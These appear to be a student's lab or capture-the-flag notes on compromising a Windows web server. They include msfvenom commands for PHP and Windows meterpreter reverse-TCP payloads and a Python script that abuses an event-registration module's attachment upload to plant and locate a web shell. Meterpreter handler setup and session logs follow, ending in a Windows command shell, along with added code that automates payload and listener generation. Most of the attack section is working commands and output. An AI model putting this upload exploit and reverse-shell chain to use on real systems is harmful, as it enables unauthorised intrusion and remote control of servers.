meterpreter php payload && windows payload: study notes
1. Scenario
Local Kali Linux box: 192.168.1.2
Target: a Windows server at 192.168.1.4 (a Windows 6.3.9600 build, i.e. 8.1 / Server 2012 R2, going by the cmd.exe banner further down)
Goal: obtain a shell on the target
2. Procedure
First open a terminal on the Kali box and start msfconsole.
Generate the PHP payload, shell.php. Note that php/meterpreter_reverse_tcp is the stageless payload; the same name has to be used for the handler later:
root@simpleedu:~# rz
root@simpleedu:~# msfconsole
msf > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30092 bytes
Upload it to the server with a script. The Python script was written on a local Windows machine and copied to Kali with rz over Xshell (provided by pxy, a classmate). It works as follows: the application's emailRegistrants action accepts an attachment and stores it under tmp/ as <unix timestamp>_shell.php; the script reads the server's current time out of the History.pushState() call on the calendar page, then probes the last 20 candidate names until one returns 200.
import sys
import requests

base_url = "http://192.168.1.4/"
# Calendar page: its History.pushState() call carries the server's current Unix time
url_for_time = "index.php?module=eventregistration&action=eventsCalendar"
# The "email registrants" action accepts an attachment and stores it under tmp/
url_for_upload = ("index.php?module=eventregistration&action=emailRegistrants"
                  "&email_addresses=123456789@123.com&email_message=1&email_subject=1")

with open("shell.php", "rb") as f:
    requests.post(base_url + url_for_upload, files={"attach": f})
print("upload finish")

# Read the server time the page embedded, so the stored file name can be guessed
r = requests.get(base_url + url_for_time)
html1 = r.text
index = html1.find("History.pushState")
if index == -1:   # str.find() returns -1 on a miss; the original tested `if index:`, which is true for -1
    print("something wrong")
    sys.exit(0)
time = html1[index:index + 60].split("rel")[1].split('"')[1]
print("get time:" + time)

# The upload was saved as tmp/<unix_time>_shell.php; probe the last 20 seconds
for i in range(int(time), int(time) - 20, -1):
    shell_url = base_url + "tmp/" + str(i) + "_shell.php"
    r2 = requests.get(shell_url)
    if r2.status_code == 200:
        print("shell is here : " + shell_url)
Then, in msfconsole, start a listener: use multi/handler, set the payload to php/meterpreter_reverse_tcp (the exact name that was given to msfvenom; the staged php/meterpreter/reverse_tcp is a different payload), set LHOST and LPORT, and run exploit:
msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.2:4444
Request the shell URL the script printed in a browser. Every request to shell.php runs the payload, and now that the handler is listening the connect-back succeeds. (The script's own probe already executed the file once, with no listener up; that is the order you want, because a request to shell.php while a handler is listening is likely to block for as long as the session lives.)
The local terminal then shows that a session has been opened.
`sessions` lists the existing sessions; `sessions -i 1` interacts with the first one.
Through this PHP session you can do basic things such as pwd, ls and upload.
It does not give you a Windows shell, though, which is why the next step builds a native Windows payload.
msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:49203) at 2020-02-27 01:02:27 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  30092  fil   2020-02-26 16:59:10 -0500  1582754354_shell.php
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  css
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  elfinder
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  extensionuploads
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  img_cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  minify
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  pixidou
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  rsscache
40777/rwxrwxrwx   32768  dir   2018-01-10 13:44:24 -0500  views_c
Then open a new terminal, start another msfconsole, and build a Windows payload, shell.exe. The port must not collide with the one the PHP handler already occupies (443 here, versus 4444). Check LHOST as well: the transcript below passes LHOST=192.168.1.101 to msfvenom, while the handler listens on 192.168.1.2; the address baked into shell.exe has to be the handler's address or the callback never arrives.
msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
Then upload it to the server through the PHP session. `upload` writes into the session's current directory, which here is the web root's tmp directory, so the file is both on disk and reachable over HTTP:
meterpreter > upload shell.exe
[*] uploading  : shell.exe -> shell.exe
[*] uploaded   : shell.exe -> shell.exe
meterpreter > ls
Listing: C:\phpStudy\WWW\tmp
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  30092  fil   2020-02-26 16:59:10 -0500  1582754354_shell.php
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  css
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  elfinder
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  extensionuploads
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  img_cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  minify
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  pixidou
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  rsscache
100777/rwxrwxrwx  73802  fil   2020-02-26 17:02:33 -0500  shell.exe
40777/rwxrwxrwx   32768  dir   2018-01-10 13:44:24 -0500  views_c
Now, in the new terminal, start a second listener: use multi/handler, set the payload to windows/meterpreter/reverse_tcp, set LHOST and LPORT (443), and run exploit:
root@simpleedu:~# msfconsole

       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.2:443
Then run the Windows payload from the PHP session with execute -f shell.exe. The -f flag names the executable; the two forms without it are rejected:
meterpreter > execute shell.exe
[-] You must specify an executable file with -f
meterpreter > execute shell.exe -f
[-] You must specify an executable file with -f
meterpreter > execute -f shell.exe
Process 2640 created.
The new terminal now reports a session.
It can be used in the same way as the PHP session above,
and in addition it gives a Windows command shell via `shell`:
msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.4:49204) at 2020-02-27 01:05:06 -0500
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 640 created.
Channel 1 created.
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。

C:\phpStudy\WWW\tmp>cd C:
cd C:
C:\phpStudy\WWW\tmp

C:\phpStudy\WWW\tmp>cd^H^H^H"
" 不是内部或外部命令,也不是可运行的程序或批处理文件。

C:\phpStudy\WWW\tmp>c:
c:

The Chinese lines are the cmd.exe banner ("Version 6.3.9600", "All rights reserved.") and the "is not recognized as an internal or external command, operable program or batch file" error. In the terminal they appeared as mojibake (the ASCII parts were readable); they are shown repaired here, and section 3 deals with the cause. Note also that the backspaces typed into the channel were not interpreted, so the stray `"` was sent to cmd as-is.
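The two handlers above were typed by hand, and the transcript shows how easy it is to let the values drift (a staged-versus-stageless payload name, an LHOST that differs from the listener, a port already taken by the first handler). The following added example, which is not code from the original post, describes each stage once and derives both the msfvenom command and an msfconsole resource script from it, refusing configurations that would fail silently. The payload names, addresses and ports are the ones used in the post; the output file names, the resource file name handlers.rc and the use of ExitOnSession with `exploit -j -z` are my choices, not the post's.

```python
# Added example: generate matching msfvenom commands and a multi/handler
# resource script from one description per stage, so the payload name,
# LHOST and LPORT baked into each file always equal what the handler expects.
from dataclasses import dataclass
import shlex


@dataclass(frozen=True)
class Stage:
    payload: str   # exact Metasploit payload name ('_' vs '/' distinguishes stageless from staged)
    lhost: str     # address the handler binds and the payload connects back to
    lport: int
    fmt: str       # msfvenom output format (-f)
    outfile: str   # where msfvenom writes the payload (-o); file names are assumptions


# Values taken from the post: stageless PHP meterpreter on 4444, staged Windows meterpreter on 443
STAGES = [
    Stage("php/meterpreter_reverse_tcp", "192.168.1.2", 4444, "raw", "shell.php"),
    Stage("windows/meterpreter/reverse_tcp", "192.168.1.2", 443, "exe", "shell.exe"),
]


def validate(stages):
    """Reject configurations that fail quietly at run time: two handlers on one port
    (the second cannot bind), or stages that call back to different hosts."""
    ports = [s.lport for s in stages]
    if len(set(ports)) != len(ports):
        raise ValueError("LPORT collision between stages: %r" % ports)
    hosts = {s.lhost for s in stages}
    if len(hosts) != 1:
        raise ValueError("LHOST differs between stages: %r" % sorted(hosts))
    for s in stages:
        if not 1 <= s.lport <= 65535:
            raise ValueError("LPORT out of range: %d" % s.lport)
    return True


def msfvenom_cmd(stage):
    """The msfvenom invocation that produces the payload file for one stage."""
    parts = ["msfvenom", "-p", stage.payload,
             "LHOST=%s" % stage.lhost, "LPORT=%d" % stage.lport,
             "-f", stage.fmt, "-o", stage.outfile]
    return " ".join(shlex.quote(p) for p in parts)


def handler_rc(stages):
    """msfconsole resource script: one multi/handler per stage, each started as a
    background job (-j) without auto-interaction (-z). ExitOnSession false keeps
    the PHP listener up after its first session so a re-run of shell.php still lands."""
    lines = []
    for s in stages:
        lines += [
            "use exploit/multi/handler",
            "set payload %s" % s.payload,   # identical to the -p value passed to msfvenom
            "set LHOST %s" % s.lhost,
            "set LPORT %d" % s.lport,
            "set ExitOnSession false",
            "exploit -j -z",
        ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    validate(STAGES)
    for s in STAGES:
        print(msfvenom_cmd(s))
    with open("handlers.rc", "w") as f:
        f.write(handler_rc(STAGES))
    print("wrote handlers.rc; start both listeners with: msfconsole -r handlers.rc")
```

Running the script prints the two msfvenom commands and writes handlers.rc; `msfconsole -r handlers.rc` then starts both listeners in one console, so a single `sessions` call shows the PHP and the Windows session side by side instead of spreading them over two terminals as in the post.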
3. Fixing the garbled Chinese in the Windows shell reached through meterpreter

Run chcp 65001 in the cmd shell to switch that console to UTF-8. Before the switch, cmd's messages come out as mojibake; afterwards the same `type 2.key` error is legible, and it turns out to be a permissions failure ("Access is denied."), not an encoding problem:

C:\>type 2.key
type 2.key
拒绝访问。   (displayed as mojibake before the code page change)

C:\>chcp 65001
chcp 65001
Active code page: 65001

C:\>type 2.key
type 2.key
Access is denied.

chcp only affects the cmd.exe process behind that channel; a new `shell` opened later from meterpreter starts with the system default code page again, so the command has to be repeated.
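The garbling has a simple cause, and it can also be undone on the attacker's side without touching the target's console settings. A Chinese Windows cmd.exe writes its messages in code page 936 (GBK); meterpreter's shell channel forwards those bytes unchanged, and a UTF-8 terminal decodes them as UTF-8, showing each byte it cannot decode as a Latin-1 character. The added example below, which is not from the original post, reproduces exactly what the post's terminal printed for the banner ("版本" became "°汾") and shows the correct decoding with the code page reported by `chcp`. The banner text is constructed from the version string in the post; the function names are mine.

```python
# Added example: reproduce the mojibake seen in the meterpreter shell channel and
# decode the same bytes correctly using the console code page cmd.exe actually used.
import codecs

# Code page numbers as printed by `chcp`, mapped to Python codec names
CODEPAGES = {936: "gbk", 65001: "utf-8", 437: "cp437", 1252: "cp1252"}


def _latin1_fallback(exc):
    """Error handler: show the undecodable byte as its Latin-1 character and resume
    one byte later. This mirrors what the UTF-8 terminal did in the post."""
    bad = exc.object[exc.start:exc.start + 1]
    return (bad.decode("latin-1"), exc.start + 1)


codecs.register_error("latin1_fallback", _latin1_fallback)


def terminal_view(raw):
    """What a UTF-8 terminal displays for raw console bytes written in another code page."""
    return raw.decode("utf-8", errors="latin1_fallback")


def decode_console(raw, codepage):
    """Decode console bytes with the code page the target shell reported via `chcp`."""
    return raw.decode(CODEPAGES[codepage])


# Constructed sample: the banner cmd.exe prints on a Chinese Windows 6.3.9600 install,
# encoded as the console emits it under code page 936 (GBK: 版 = B0 E6, 本 = B1 BE).
BANNER = "Microsoft Windows [版本 6.3.9600]"
RAW_936 = BANNER.encode("gbk")

if __name__ == "__main__":
    # 0xB0 is not a valid UTF-8 start byte, so it is shown as Latin-1 '°'; the next
    # three bytes E6 B1 BE happen to form a valid UTF-8 sequence for '汾'.
    print(terminal_view(RAW_936))         # Microsoft Windows [°汾 6.3.9600]
    print(decode_console(RAW_936, 936))   # Microsoft Windows [版本 6.3.9600]
```

The practical consequence: `chcp 65001` fixes the display by making cmd emit UTF-8, but if you are logging the channel or post-processing output, decoding the captured bytes as GBK (code page 936) recovers the original text without changing anything on the target. Which code page applies is whatever `chcp` prints on that host; 936 is the default for Simplified Chinese installs.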